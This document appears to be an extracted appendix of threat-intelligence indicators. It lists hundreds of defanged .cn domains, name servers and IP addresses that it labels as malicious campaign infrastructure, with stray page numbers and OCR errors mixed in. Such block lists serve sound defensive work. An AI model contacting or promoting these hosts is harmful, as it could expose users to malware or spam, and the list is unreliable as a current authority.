hxxp://pipwoqul.cn 
hxxp://zilfumam.cn 
hxxp://fokvidem.cn 
hxxp://vamhefem.cn 
hxxp://hipxetem.cn 
hxxp://hasrozem.cn 
hxxp://yovbafim.cn 
hxxp://zutgaqim.cn 
hxxp://kamnorim.cn 
hxxp://nussotim.cn 
hxxp://yiblegom.cn 
hxxp://vorteyom.cn 
hxxp://mokgupum.cn 
hxxp://xennesum.cn 
hxxp://feshivum.cn 
hxxp://nakcaban.cn 


hxxp://yaxxokan.cn 


5705 


hxxp://qikciqan.cn 
hxxp://gagsuran.cn 
hxxp://bopxuran.cn 
hxxp://giwduvan.cn 
hxxp://gixreqin.cn 
hxxp://leccatin.cn 
hxxp://jollipon.cn 
hxxp://vuzlopon.cn 
hxxp://butkoxon.cn 
hxxp://falyewun.cn 
hxxp://noscajap.cn 
hxxp://xirqocep.cn 
hxxp://daqdohep.cn 
hxxp://wokvarep.cn 
hxxp://hoggudip.cn 
hxxp://heqfavip.cn 
hxxp://jowrewip.cn 
hxxp://cimqiqop.cn 
hxxp://cibqobup.cn 
hxxp://zijreyup.cn 
hxxp://tosnabaq.cn 
hxxp://tochekaq.cn 
hxxp://cosmoqaq.cn 
hxxp://zavnusaq.cn 


hxxp://vufsaqeq.cn 
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hxxp://dagligig.cn 
hxxp://wugjaziq.cn 
hxxp://fepsuwoq.cn 
hxxp://pombeyoq.cn 
hxxp://dokcokuq.cn 
hxxp://diwsutuq.cn 
hxxp://sayjumar.cn 
hxxp://jidxurer.cn 
hxxp://qalhiyir.cn 
hxxp://goqtogor.cn 
hxxp://gaxdavor.cn 
hxxp://Kazqikas.cn 
hxxp://piskeces.cn 
hxxp://qamhadis.cn 
hxxp://wifdixis.cn 
hxxp://hejhelos.cn 
hxxp://hedwimos.cn 
hxxp://kerrucus.cn 
hxxp://forhalus.cn 
hxxp://fesnupus.cn 
hxxp://lanzuhat.cn 
hxxp://kadmepat.cn 
hxxp://potzoyat.cn 
hxxp://jupkevet.cn 


hxxp://xagmigqit.cn 
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hxxp://woxjatit.cn 
hxxp://gukpuxit.cn 
hxxp://dubpacut.cn 
hxxp://nifbihut.cn 
hxxp://qunkofav.cn 
hxxp://vippogav.cn 
hxxp://rimjulav.cn 
hxxp://kemhenav.cn 
hxxp://gutziqav.cn 
hxxp://gipbilev.cn 
hxxp://kaxcidiv.cn 
hxxp://xajwawov.cn 
hxxp://rejcoyov.cn 
hxxp://jogsuduv.cn 
hxxp://lamfoguv.cn 
hxxp://daxtohuv.cn 
hxxp://mihwuxuv.cn 
hxxp://hiwjuhaw.cn 
hxxp://gohkijaw.cn 
hxxp://tuwqetaw.cn 
hxxp://lacjebew.cn 
hxxp://vodrubew.cn 
hxxp://pehwitew.cn 
hxxp://yezxewew.cn 


hxxp://yuvsobow.cn 
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hxxp://yodmapow.cn 
hxxp://qotpobuw.cn 
hxxp://megrafuw.cn 
hxxp://Zamponuw.cn 
hxxp://kotzequw.cn 
hxxp://yudmaruw.cn 
hxxp://hamgiruw.cn 
hxxp://siwwawuw.cn 
hxxp://veqniwuw.cn 
hxxp://bepnudax.cn 
hxxp://jehfefax.cn 
hxxp://boxjokex.cn 
hxxp://yoclerex.cn 
hxxp://guzjacix.cn 
hxxp://mexcekix.cn 
hxxp://kibtixix.cn 
hxxp://conyixix.cn 
hxxp://famlojox.cn 
hxxp://jizwalox.cn 
hxxp://dahhowox.cn 
hxxp://zicquvtx.cn 
hxxp://cavxujux.cn 


hxxp://voqnolux.cn 


Known to have responded to the same malicious IP (60.191.221.123) are also the fol- 
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lowing malicious domains: 
hxxp://vitsulob.cn 
hxxp://jahnivub.cn 
hxxp://wipviyub.cn 
hxxp://gokbulac.cn 
hxxp://bedqaqac.cn 
hxxp://suvnuqac.cn 
hxxp://wukcilec.cn 
hxxp://lukbolec.cn 
hxxp://juhfagic.cn 
hxxp://mixwigic.cn 
hxxp://qikloric.cn 
hxxp://halgiyic.cn 
hxxp://jocvoloc.cn 
hxxp://gugmikad.cn 
hxxp://zoqvulad.cn 
hxxp://zokdoled.cn 
hxxp://daxlated.cn 
hxxp://cahnubid.cn 
hxxp://cufxuhod.cn 
hxxp://libsorod.cn 
hxxp://vopgatod.cn 
hxxp://cebvoyod.cn 
hxxp://lansocud.cn 


hxxp://zohpakud.cn 
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hxxp://hekwasud.cn 
hxxp://niknuvud.cn 
hxxp://meymuhaf.cn 
hxxp://nigkojef.cn 
hxxp://bazmoyef.cn 
hxxp://roszadif.cn 
hxxp://sapmofif.cn 
hxxp://kudxodof.cn 
hxxp://pefkipof.cn 
hxxp://xoqresof.cn 
hxxp://fipxevof.cn 
hxxp://quyzeluf.cn 
hxxp://xujyeruf.cn 
hxxp://xenpikeg.cn 
hxxp://tafwohig.cn 
hxxp://kowtuhig.cn 
hxxp://dinpisig.cn 
hxxp://teryuvig.cn 
hxxp://funcizig.cn 
hxxp://ciytamog.cn 
hxxp://jemsowog.cn 
hxxp://kiqzijug.cn 
hxxp://pulfaxug.cn 
hxxp://wojlabah.cn 


hxxp://belzejah.cn 
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hxxp://pefdovah.cn 
hxxp://xijsameh.cn 
hxxp://racridih.cn 
hxxp://rewfahih.cn 
hxxp://vinxujih.cn 
hxxp://qujvosih.cn 
hxxp://figqacuh.cn 
hxxp://xohmoluh.cn 
hxxp://jicniwuh.cn 
hxxp://Kapxuraj.cn 
hxxp://jubjavaj.cn 
hxxp://bidkuqej.cn 
hxxp://jarvixej.cn 
hxxp://qinzidij.cn 
hxxp://zagzafij.cn 
hxxp://merjuwij.cn 
hxxp://weqbujuj.cn 
hxxp://gucdaluj.cn 
hxxp://modxowuyj.cn 
hxxp://tobponak.cn 
hxxp://tacjujek.cn 
hxxp://fumligek.cn 
hxxp://wavfebik.cn 
hxxp://xizqibik.cn 


hxxp://focnigik.cn 
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hxxp://biqmipik.cn 
hxxp://zowcogik.cn 
hxxp://fexsitik.cn 
hxxp://qebdevik.cn 
hxxp://xolkisok.cn 
hxxp://kuqwuwok.cn 
hxxp://gunwonuk.cn 
hxxp://hewquvuk.cn 
hxxp://gunbaqal.cn 
hxxp://seysixal.cn 
hxxp://zaymamel.cn 
hxxp://weznohil.cn 
hxxp://keczakil.cn 
hxxp://wawberol.cn 
hxxp://naftemul.cn 
hxxp://sedbonam.cn 
hxxp://velwapam.cn 
hxxp://zinzutam.cn 
hxxp://nudgixam.cn 
hxxp://mibpabem.cn 
hxxp://yolbaqem.cn 
hxxp://fogdugem.cn 
hxxp://qawtotem.cn 
hxxp://qalfusim.cn 


hxxp://kocguwim.cn 


5713 


hxxp://zishikom.cn 
hxxp://kozpipom.cn 
hxxp://loblahum.cn 
hxxp://winbomum.cn 
hxxp://jakmezum.cn 
hxxp://taglolan.cn 
hxxp://suznuwan.cn 
hxxp://jekwazan.cn 
hxxp://toxmijen.cn 
hxxp://nikguzen.cn 
hxxp://dedmewin.cn 
hxxp://jebvuwun.cn 
hxxp://tupsikap.cn 
hxxp://dudsuzap.cn 
hxxp://yessafep.cn 
hxxp://danxenep.cn 
hxxp://leklidip.cn 
hxxp://duklimip.cn 
hxxp://yevnurip.cn 
hxxp://virrotip.cn 
hxxp://lalyezop.cn 
hxxp://jaztecup.cn 
hxxp://gokbehup.cn 
hxxp://cuqyirup.cn 


hxxp://gajvizup.cn 
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hxxp://cahwikaq.cn 
hxxp://xeqbelaq.cn 
hxxp://xicbamaq.cn 
hxxp://qofgoneq.cn 
hxxp://givxuyeq.cn 
hxxp://gonganiq.cn 
hxxp://vijsozig.cn 
hxxp://bignijog.cn 
hxxp://jejroxog.cn 
hxxp://culfunuq.cn 
hxxp://qevxayuq.cn 
hxxp://merwosar.cn 
hxxp://loxvafer.cn 
hxxp://cawnamir.cn 
hxxp://wocyorir.cn 
hxxp://tokhador.cn 
hxxp://yuznisor.cn 
hxxp://vamtator.cn 
hxxp://gojligur.cn 
hxxp://vukgejur.cn 
hxxp://fewxopur.cn 
hxxp://wukwoxur.cn 
hxxp://bavyoxur.cn 
hxxp://jegdufas.cn 


hxxp://rillefes.cn 


5715 


hxxp://niwwages.cn 
hxxp://comrames.cn 
hxxp://rohfapes.cn 
hxxp://lehredis.cn 
hxxp://jepniwos.cn 
hxxp://lexxedus.cn 
hxxp://xuljuhus.cn 
hxxp://levgepat.cn 
hxxp://modhewet.cn 
hxxp://kawlozet.cn 
hxxp://bufsofit.cn 
hxxp://gekloyit.cn 
hxxp://tercifot.cn 
hxxp://yughaqut.cn 
hxxp://surfabav.cn 
hxxp://yutbevav.cn 
hxxp://mowvahev.cn 
hxxp://tuwcexev.cn 
hxxp://liqfimiv.cn 
hxxp://pefxamuv.cn 
hxxp://goqdexuv.cn 
hxxp://fozlubaw.cn 
hxxp://yuxcizaw.cn 
hxxp://mevvubew.cn 


hxxp://nuzzuhew.cn 
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hxxp://dibkicow.cn 
hxxp://lobrakow.cn 
hxxp://vuksirow.cn 
hxxp://samnuvow.cn 
hxxp://jizlotuw.cn 
hxxp://buzgikax.cn 
hxxp://jawcesax.cn 
hxxp://qatvegex.cn 
hxxp://gegfejex.cn 
hxxp://cigxekex.cn 
hxxp://kejjobox.cn 
hxxp://yosbucox.cn 
hxxp://kelmogox.cn 
hxxp://jeqyuzox.cn 
hxxp://jocxebux.cn 
hxxp://tawcizux.cn 
hxxp://kittokay.cn 
hxxp://seryusay.cn 
hxxp://nocbusey.cn 
hxxp://semfihiy.cn 
hxxp://xotgajiy.cn 
hxxp://sarvujiy.cn 
hxxp://gicmosiy.cn 
hxxp://fulpaziy.cn 


hxxp://cunzumoy.cn 
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Related malicious name servers known to have participated in the campaign: 
hxxp://ns2.boostaroma.com - 110.52.6.252 
hxxp://ns2.okultra.com 
hxxp://ns2.swellfab.com 
hxxp://ns2.shehead.com 
hxxp://ns2.atbread.com 
hxxp://ns2.treatglad.com 
hxxp://ns2.plumbold.com 
hxxp://ns2.callold.com 
hxxp://up2.thicksend.com 
hxxp://ns6.zestkind.com 
hxxp://ns2.burnround.com 
hxxp://ns2.witproud.com 
hxxp://ns2.fizznice.com 
hxxp://ns6.plusspice.com 
hxxp://up2.humaneagree.com 
hxxp://ns2.adorewee.com 
hxxp://ns4.kindable.com 
hxxp://ns2.prideable.com 
hxxp://ns2.cuddlyhumble.com 
hxxp://ns2.ablewhole.com 
hxxp://ns2.quickwhole.com 
hxxp://ns2.plumpwhole.com 


hxxp://up2.begancome.com 
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hxxp://up2.sizeplane.com 
hxxp://up2.colonytype.com 
hxxp://ns6.prizeaware.com 
hxxp://ns2.pridesure.com 
hxxp://ns2.toophrase.com 
hxxp://ns2.loyalrise.com 
hxxp://up2.pathuse.com 
hxxp://ns2.dimplechaste.com 
hxxp://ns2.welltrue.com 
hxxp://ns2.ziptrue.com 
hxxp://ns2.silverwe.com 
hxxp://ns2.calmprize.com 
hxxp://ns2.firmrich.com 
hxxp://ns2.activeinch.com 
hxxp://ns2.cookmulti.com 
hxxp://ns2.wellmoral.com 
hxxp://ns2.peakswell.com 
hxxp://ns2.posewill.com 
hxxp://ns2.droolcool.com 
hxxp://up2.cuddlypoem.com 
hxxp://ns2.loyalcalm.com 
hxxp://ns2.extolcalm.com 
hxxp://ns2.radiothan.com 
hxxp://up2.persontrain.com 


hxxp://ns2.awardfun.com 
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hxxp://ns4.zealreap.com 
hxxp://ns2.piousreap.com 
hxxp://ns2.firstreap.com 
hxxp://ns2.grandzap.com 
hxxp://ns2.royalzap.com 
hxxp://ns6.ablezip.com 
hxxp://ns2.zapeager.com 
hxxp://up2.blockfather.com 
hxxp://ns2.breezycorner.com 
hxxp://ns2.donewater.com 
hxxp://ns2.listenflower.com 
hxxp://ns2.dimplechair.com 
hxxp://up2.yardcolor.com 
hxxp://ns4.fizzleads.com 
hxxp://up2.finestgrass.com 
hxxp://ns2.prizebeats.com 
hxxp://ns4.maxigreat.com 
hxxp://ns2.flairtreat.com 
hxxp://up2.tingleflat.com 
hxxp://ns6.proudquiet.com 
hxxp://ns2.morequiet.com 
hxxp://ns2.droolplanet.com 
hxxp://up2.giftedunit.com 
hxxp://ns2.solarwit.com 


hxxp://ns2.ropemeant.com 
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hxxp://ns2.paradiseobedient.com 
hxxp://ns4.paradiseobedient.com 
hxxp://up2.minealert.com 
hxxp://ns4.spicyrest.com 
hxxp://ns4.alertjust.com 
hxxp://ns2.resttrust.com 
hxxp://ns2.pagefew.com 
hxxp://ns2.multiaglow.com 
hxxp://ns2.objectallow.com 
hxxp://ns2.alertwow.com 
hxxp://ns2.alivejuicy.com 
hxxp://ns2.restjuicy.com 
hxxp://ns2.funcomfy.com 
hxxp://ns2.solarcomfy.com 
hxxp://ns2.prizetangy.com 
hxxp://ns2.wholehappy.com 
hxxp://ns2.prideeasy.com 
hxxp://ns2.suddeneasy.com 
hxxp://ns2.treatrosy.com 


hxxp://ns2.earlytwenty.com 


Related malicious domains known to have participated in the campaign: 


hxxp://xiskizop.cn - 58.17.3.44; 60.191.239.189; 203.93.208.86 - hxxp://ns5.prizeaware.com; 
hxxp://nsl.grandzap.com; hxxp://ns3.alertjust.com 


Related malicious domains known to have participated in the campaigns: 
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hxxp://xancefab.cn 
hxxp://busgihab.cn 
hxxp://putcojab.cn 
hxxp://nizvonab.cn 
hxxp://bulpapab.cn 
hxxp://laztoqab.cn 
hxxp://varsesab.cn 
hxxp://pahdeheb.cn 
hxxp://wiqponeb.cn 
hxxp://rutfuseb.cn 
hxxp://zacniyeb.cn 
hxxp://beblelib.cn 
hxxp://gahvosib.cn 
hxxp://rigzowib.cn 
hxxp://bacnaxib.cn 
hxxp://pexyufob.cn 
hxxp://sowgugob.cn 
hxxp://buhbulob.cn 
hxxp://ciyobufub.cn 
hxxp://xoddimub.cn 
hxxp://nugtaqub.cn 
hxxp://buvkuzub.cn 
hxxp://fikqebac.cn 
hxxp://pevremac.cn 


hxxp://qokbasac.cn 
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hxxp://patmebec.cn 
hxxp://kuntigec.cn 
hxxp://jolcekec.cn 
hxxp://wihjorec.cn 
hxxp://fixruyec.cn 
hxxp://gospozec.cn 
hxxp://batrijic.cn 
hxxp://rebzomic.cn 
hxxp://loqrupic.cn 
hxxp://diqhagic.cn 
hxxp://bohkogic.cn 
hxxp://beszesic.cn 
hxxp://tuzhovic.cn 
hxxp://hesyuvic.cn 
hxxp://kovhewic.cn 
hxxp://lufreyic.cn 
hxxp://noxrazic.cn 
hxxp://lefviboc.cn 
hxxp://fodcuboc.cn 
hxxp://pevhihoc.cn 
hxxp://widlajoc.cn 
hxxp://zocwoloc.cn 
hxxp://janpupoc.cn 
hxxp://mefbuqoc.cn 


hxxp://hujqezoc.cn 


5723 


hxxp://capjebuc.cn 
hxxp://befqacuc.cn 
hxxp://socjujuc.cn 
hxxp://qivbiruc.cn 
hxxp://tuxbaxuc.cn 
hxxp://tidsuyuc.cn 
hxxp://kapdacad.cn 
hxxp://lagfagad.cn 
hxxp://japtugad.cn 
hxxp://bechumad.cn 
hxxp://holceqad.cn 
hxxp://bectusad.cn 
hxxp://tabzuwad.cn 
hxxp://rednezad.cn 
hxxp://megzizad.cn 
hxxp://forvafed.cn 
hxxp://hojliged.cn 
hxxp://fuxcexed.cn 
hxxp://baxpuxed.cn 
hxxp://lugjized.cn 
hxxp://lewdozed.cn 
hxxp://hiszedid.cn 
hxxp://buyquhid.cn 
hxxp://wovyokid.cn 


hxxp://yojvimid.cn 
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hxxp://widxixid.cn 
hxxp://yovxoxid.cn 
hxxp://reywufod.cn 
hxxp://hubzahod.cn 
hxxp://qapzekod.cn 
hxxp://falxalod.cn 
hxxp://yiznunod.cn 
hxxp://towqgotod.cn 
hxxp://loxlayod.cn 
hxxp://rockozod.cn 
hxxp://johmabud.cn 
hxxp://muvyucud.cn 
hxxp://vattehud.cn 
hxxp://fuytejud.cn 
hxxp://kenyilud.cn 
hxxp://cibsarud.cn 
hxxp://najsatud.cn 
hxxp://xibwazud.cn 
hxxp://laztafaf.cn 
hxxp://piynosaf.cn 
hxxp://yelpidef.cn 
hxxp://yagtudef.cn 
hxxp://levxifef.cn 
hxxp://povxajef.cn 


hxxp://hetbetef.cn 


5725 


hxxp://hudvotef.cn 
hxxp://hemfowef.cn 
hxxp://coqvazef.cn 
hxxp://yawhojif.cn 
hxxp://muvcewif.cn 
hxxp://xadgobof.cn 
hxxp://baxwuhof.cn 
hxxp://wijtekof.cn 
hxxp://sknqikof.cn 
hxxp://mussiqof.cn 
hxxp://gegwasof.cn 
hxxp://xangesof.cn 
hxxp://wumdewof.cn 
hxxp://hoqtayof.cn 
hxxp://kiyvayof.cn 
hxxp://cufdicuf.cn 
hxxp://gotbucuf.cn 
hxxp://gexzehuf.cn 
hxxp://cepceluf.cn 
hxxp://gepleluf.cn 
hxxp://tefhosuf.cn 
hxxp://xaqqivuf.cn 
hxxp://wubfezuf.cn 
hxxp://panrozuf.cn 


hxxp://nadvofag.cn 
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hxxp://yawjehag.cn 
hxxp://zeltimag.cn 
hxxp://misgaqag.cn 
hxxp://noxyaxag.cn 
hxxp://sunluxag.cn 
hxxp://bozhoceg.cn 
hxxp://dawgefeg.cn 
hxxp://locfemeg.cn 
hxxp://mivlaneg.cn 
hxxp://vaqxiseg.cn 
hxxp://gesyateg.cn 
hxxp://kumweteg.cn 
hxxp://jefpaveg.cn 
hxxp://lilyegig.cn 
hxxp://janweqig.cn 
hxxp://diwjusig.cn 
hxxp://sohmiwig.cn 
hxxp://rimmazig.cn 
hxxp://tirpedog.cn 
hxxp://jamguhog.cn 
hxxp://bejfakog.cn 
hxxp://bebyolog.cn 
hxxp://kixmamog.cn 
hxxp://tofyeqog.cn 


hxxp://kojxuqog.cn 


5727 


hxxp://puqtabug.cn 
hxxp://suszibug.cn 
hxxp://ciwracug.cn 
hxxp://nahbugug.cn 
hxxp://gaygokug.cn 
hxxp://seygoqug.cn 
hxxp://helqasug.cn 
hxxp://tockesug.cn 
hxxp://jipqevug.cn 
hxxp://rewnowug.cn 
hxxp://nazxefah.cn 
hxxp://hofkagah.cn 
hxxp://coszegah.cn 
hxxp://vojyojah.cn 
hxxp://nihwalah.cn 
hxxp://yojzatah.cn 
hxxp://buvsutah.cn 
hxxp://hulgadeh.cn 
hxxp://nibzofeh.cn 
hxxp://xickeqeh.cn 
hxxp://kapmereh.cn 
hxxp://regyaveh.cn 
hxxp://lizpazeh.cn 
hxxp://lujpobih.cn 


hxxp://xozyecih.cn 
5728 


hxxp://telhetih.cn 
hxxp://dussadoh.cn 
hxxp://lerbenoh.cn 
hxxp://yokveqoh.cn 
hxxp://hafgogoh.cn 
hxxp://gagkiroh.cn 
hxxp://teftebuh.cn 
hxxp://fitsofuh.cn 
hxxp://ziwvomuh.cn 
hxxp://fazlenuh.cn 
hxxp://gazkinuh.cn 
hxxp://dutmivuh.cn 
hxxp://zukdayuh.cn 
hxxp://busgayuh.cn 
hxxp://nohpobaj.cn 
hxxp://qusdumaj.cn 
hxxp://wizdagaj.cn 
hxxp://wuwbeqaj.cn 
hxxp://girzidej.cn 
hxxp://vespifej.cn 
hxxp://ceszegej.cn 
hxxp://jugbumej.cn 


hxxp://xuxmanej.cn 


Related malicious name servers known to have participated in the campaign: 
5729 


hxxp://ns1.quvzipda.com - 193.165.209.3 
hxxp://ns1.syquskezaja.com 
hxxp://ns1.mnysiwugpa.com 
hxxp://ns1.uzfayxlob.com 
hxxp://ns1.umkeihfub.com 
hxxp://ns1.diethealthworld.com 
hxxp://ns2.diethealthworld.com 
hxxp://ns1.pillshopstore.com 
hxxp://ns2.pillshopstore.com 
hxxp://ns1.ixcopvudeg.com 
hxxp://ns1.cuzatpih.com 
hxxp://ns1.fondukoiwi.com 
hxxp://ns1.zevmyxhyhl.com 
hxxp://ns1.pecsletoil.com 
hxxp://ns1.havputviwl.com 
hxxp://ns1.icuhzapyl.com 
hxxp://ns1.ollectimon.com 
hxxp://ns1.calpuwhup.com 
hxxp://ns1.miacohder.com 
hxxp://ns1.rjycbaswes.com 
hxxp://ns1.tlyldihkis.com 
hxxp://ns2.bestfreepills.com 
hxxp://ns2.storehealthpills.com 
hxxp://ns1.medspillsdiscounts.com 


hxxp://ns1.ribormolu.com 
5730 


hxxp://ns1.sluxjagvyw.com 
hxxp://ns1.marttabletsrx.com 
hxxp://ns1.zirremeaby.com 
hxxp://ns1.xioduvvejy.com 
hxxp://ns1.tmypheatvy.com 
hxxp://ns1.zurmeigguz.com 
hxxp://ns1.pendyxconvam.net 
hxxp://ns1.mevkybmomu.net 
hxxp://ns1.wutvymnu.net 
hxxp://nsl.atquackephix.net 
hxxp://ns1l.gneqwyapuz.net 
hxxp://ns1.az6.ru 
hxxp://ns1.compmegastore.ru 
hxxp://ns1.wearcompstore.ru 
hxxp://ns1.compnetstore.ru 
hxxp://ns1.seaportative.ru 
hxxp://ns1.webshopmag.ru 
hxxp://ns2.webshopmag.ru 
hxxp://ns1.markettradersmag.ru 
hxxp://ns1.storeonlinecomp.ru 
hxxp://ns1.livingmagcomp.ru 
hxxp://ns1.magcompdirect.ru 


hxxp://ns1.storemycompdirect.ru 


Related malicious domains known to have participated in the campaigns: 
5731 


hxxp://hyuljavmyca.com - 212.174.200.111 
hxxp://rjiofnida.com 
hxxp://lubetokbufa.com 
hxxp://homhylvega.com 
hxxp://syquskezaja.com 
hxxp://kriwmikib.com 
hxxp://rhuwcugniob.com 
hxxp://fonrasetlid.com 
hxxp://rycnyrfikre.com 
hxxp://tonlijwe.com 
hxxp://mefcyqwef.com 
hxxp://lorcowurayf.com 
hxxp://ubeuhroqug.com 
hxxp://fadjybzih.com 
hxxp://ghaknikfehi.com 
hxxp://ksoknadsi.com 
hxxp://fondukoiwi.com 
hxxp://reixvyklick.com 
hxxp://qworjulnenk.com 
hxxp://svozquzrel.com 
hxxp://pecsletoil.com 
hxxp://havputviwl.com 
hxxp://pendyxconvam.com 
hxxp://whapzintaon.com 


hxxp://ollectimon.com 
5732 


hxxp://japyebawn.com 
hxxp://xovtemfajo.com 
hxxp://shymumoufjo.com 
hxxp://calpuwhup.com 
hxxp://iescehqucr.com 
hxxp://thepillcorner.com 
hxxp://kvirincyofr.com 


hxxp://iecoqwecs.com 


hxxp://syquskezaja.com - 200.204.57.187 
hxxp://cuzatpih.com 
hxxp://ollectimon.com 
hxxp://sluxjagvyw.com 
hxxp://xioduvvejy.com 
hxxp://nravsaelvi.net 
hxxp://pendyxconvam.net 
hxxp://mevkybmomu.net 
hxxp://atquackephix.net 


hxxp://gneqwyapuz.net 


Related malicious domains known to have participated in the campaign: 


hxxp://tovpuveb.cn 
hxxp://risregib.cn 
hxxp://sapwopub.cn 


hxxp://kutwuzub.cn 


5733 


hxxp://dijmigac.cn 
hxxp://davzunic.cn 
hxxp://cuwlicoc.cn 
hxxp://hinkizad.cn 
hxxp://tiwkicid.cn 
hxxp://giddehid.cn 
hxxp://qehmujid.cn 
hxxp://jadyoxid.cn 
hxxp://yipxakud.cn 
hxxp://qophepud.cn 
hxxp://nawfusud.cn 
hxxp://xohpebaf.cn 
hxxp://yilqobaf.cn 
hxxp://gelkinef.cn 
hxxp://zigconef.cn 
hxxp://vasgotef.cn 
hxxp://gitmufif.cn 
hxxp://pujxatof.cn 
hxxp://tagcafuf.cn 
hxxp://joywehuf.cn 
hxxp://xoggunuf.cn 
hxxp://pezpipuf.cn 
hxxp://gugfequf.cn 
hxxp://kattowuf.cn 


hxxp://rosmicag.cn 
5734 


hxxp://nagnuteg.cn 
hxxp://fohjedig.cn 
hxxp://hijderig.cn 
hxxp://dittomog.cn 
hxxp://zubwefah.cn 
hxxp://fodpohah.cn 
hxxp://sehviwah.cn 
hxxp://hifkuneh.cn 
hxxp://bidfecih.cn 
hxxp://wuxmulih.cn 
hxxp://beqwacoh.cn 
hxxp://qukvimoh.cn 
hxxp://vasxavoh.cn 
hxxp://salxaxoh.cn 
hxxp://labyocaj.cn 
hxxp://zigxadij.cn 
hxxp://hixkanij.cn 
hxxp://zixkitoj.cn 
hxxp://zijzoguj.cn 
hxxp://yiwzuluj.cn 
hxxp://survuruj.cn 
hxxp://feftuqak.cn 
hxxp://ziscawak.cn 
hxxp://wacpowek.cn 


hxxp://segjinuk.cn 


5735 


hxxp://vigfizuk.cn 
hxxp://qawgegal.cn 
hxxp://loqfogal.cn 
hxxp://sihwohal.cn 
hxxp://babtakal.cn 
hxxp://nagnemel.cn 
hxxp://ribwegil.cn 
hxxp://watpiyil.cn 
hxxp://goxmabul.cn 
hxxp://siwkecul.cn 
hxxp://selzimul.cn 
hxxp://qakwivul.cn 
hxxp://bedvuyul.cn 
hxxp://fiddozul.cn 
hxxp://joldokim.cn 
hxxp://foztokim.cn 
hxxp://woklahum.cn 
hxxp://gavsanum.cn 
hxxp://kejrupum.cn 
hxxp://hagjatum.cn 
hxxp://xumfuzum.cn 
hxxp://mafcocan.cn 
hxxp://geqkedan.cn 
hxxp://fumhasan.cn 


hxxp://zosqinen.cn 
5736 


hxxp://nonzinen.cn 
hxxp://tahyedin.cn 
hxxp://niyyurin.cn 
hxxp://wokmison.cn 
hxxp://nekmerun.cn 
hxxp://gebzevun.cn 
hxxp://dizxohap.cn 
hxxp://wirzovap.cn 
hxxp://cobyizip.cn 
hxxp://sokwimop.cn 
hxxp://digjipop.cn 
hxxp://qagtohup.cn 
hxxp://wodkepaq.cn 
hxxp://kuqqavaq.cn 
hxxp://vogyafeq.cn 
hxxp://qokyaziq.cn 
hxxp://gelmaloq.cn 
hxxp://rikxeduq.cn 
hxxp://mifzoyuq.cn 
hxxp://jitmekar.cn 
hxxp://zedbeper.cn 
hxxp://qoyrifir.cn 
hxxp://rerbogir.cn 
hxxp://nexyutir.cn 


hxxp://yuvwobor.cn 


5737 


hxxp://raddijor.cn 
hxxp://rehciror.cn 
hxxp://jowqasor.cn 
hxxp://wotrisor.cn 
hxxp://tinselur.cn 
hxxp://sacvakes.cn 
hxxp://xonlefis.cn 
hxxp://sehwukos.cn 
hxxp://torxupos.cn 
hxxp://yujzidus.cn 
hxxp://dejzezat.cn 
hxxp://gunjivet.cn 
hxxp://hecfocav.cn 
hxxp://yuxdiqav.cn 
hxxp://guysogiv.cn 
hxxp://tebziniv.cn 
hxxp://dedsupov.cn 
hxxp://genwsxov.cn 
hxxp://xaycozuv.cn 
hxxp://fojgoraw.cn 
hxxp://suwsozaw.cn 
hxxp://hudwuhew.cn 
hxxp://momzuhew.cn 
hxxp://pibwokiw.cn 


hxxp://lacfimiw.cn 
5738 


hxxp://jubduriw.cn 
hxxp://talcuviw.cn 
hxxp://xavgubow.cn 
hxxp://zovcofow.cn 
hxxp://qopzubax.cn 
hxxp://dogqodax.cn 
hxxp://jimjakax.cn 
hxxp://ricnafex.cn 
hxxp://nadlewex.cn 
hxxp://mokcegox.cn 
hxxp://getkixox.cn 
hxxp://wucpulux.cn 
hxxp://dalpobay.cn 
hxxp://refhagay.cn 
hxxp://jusyadey.cn 
hxxp://reqpijey.cn 
hxxp://vebzaqiy.cn 
hxxp://sejtogoy.cn 
hxxp://yecnaquy.cn 
hxxp://xufguyuy.cn 
hxxp://puktunaz.cn 
hxxp://zaztuvaz.cn 
hxxp://sixbufiz.cn 
hxxp://nofdowiz.cn 


hxxp://cuvxoqoz.cn 


5739 


hxxp://yugkiwuz.cn 


Related malicious domains known to have participated in the campaign: 
hxxp://columnultra.com - 58.17.3.41 

hxxp://milkhold.com 

hxxp://eagerboard.com 

hxxp://yesonlynoun.com 

hxxp://differdo.com 

hxxp://seemlykeep.com 

hxxp://seemnear.com 


hxxp://modernbut.com 


Related malicious domains known to have participated in the campaign: 
hxxp://litgukab.cn 
hxxp://xojyupab.cn 
hxxp://ritlarab.cn 
hxxp://qeqyukeb.cn 
hxxp://fedpijib.cn 
hxxp://xumlodob.cn 
hxxp://kozgewob.cn 
hxxp://fajnahec.cn 
hxxp://nedsicic.cn 
hxxp://hertuqic.cn 
hxxp://linrudoc.cn 


hxxp://gilqufuc.cn 
5740 


hxxp://lijwituc.cn 
hxxp://logbaxuc.cn 
hxxp://camxezuc.cn 
hxxp://foyxolad.cn 
hxxp://bapvusad.cn 
hxxp://wokmeyad.cn 
hxxp://yizqosed.cn 
hxxp://vivwiwef.cn 
hxxp://percagof.cn 
hxxp://cepceluf.cn 
hxxp://paghizuf.cn 
hxxp://vorvivag.cn 
hxxp://maynixeg.cn 
hxxp://mujyumig.cn 
hxxp://coyrekog.cn 
hxxp://xetvetih.cn 
hxxp://mugyujuh.cn 
hxxp://supsizuh.cn 
hxxp://bixtakaj.cn 
hxxp://lanmixej.cn 
hxxp://worxezej.cn 
hxxp://tikgepij.cn 
hxxp://yatsanak.cn 
hxxp://tucgosak.cn 


hxxp://hinnuwak.cn 


5741 


hxxp://qilfadek.cn 
hxxp://zibsitik.cn 
hxxp://xetmojok.cn 
hxxp://yelsecuk.cn 
hxxp://confowuk.cn 
hxxp://pozzoxuk.cn 
hxxp://savhixal.cn 
hxxp://nudtagel.cn 
hxxp://keptavol.cn 
hxxp://berqufam.cn 
hxxp://wuqrulam.cn 
hxxp://goftiwam.cn 
hxxp://vowcajem.cn 
hxxp://rizfinim.cn 
hxxp://jetgekom.cn 
hxxp://letjucun.cn 
hxxp://wivwiqap.cn 
hxxp://duccesap.cn 
hxxp://zamyisap.cn 
hxxp://ranpovep.cn 
hxxp://kucdawep.cn 
hxxp://limjapip.cn 
hxxp://ciggecop.cn 
hxxp://ziybelop.cn 


hxxp://yakquyeq.cn 
5742 


hxxp://borremiq.cn 
hxxp://vuzwesuq.cn 
hxxp://rosvocor.cn 
hxxp://nhakdugas.cn 
hxxp://kabmebes.cn 
hxxp://purhuves.cn 
hxxp://gopmocis.cn 
hxxp://cabzigis.cn 
hxxp://pomzonos.cn 
hxxp://zojvapus.cn 
hxxp://nobfemat.cn 
